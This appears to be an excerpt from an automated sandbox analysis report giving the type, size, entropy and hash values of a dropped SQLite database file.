                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3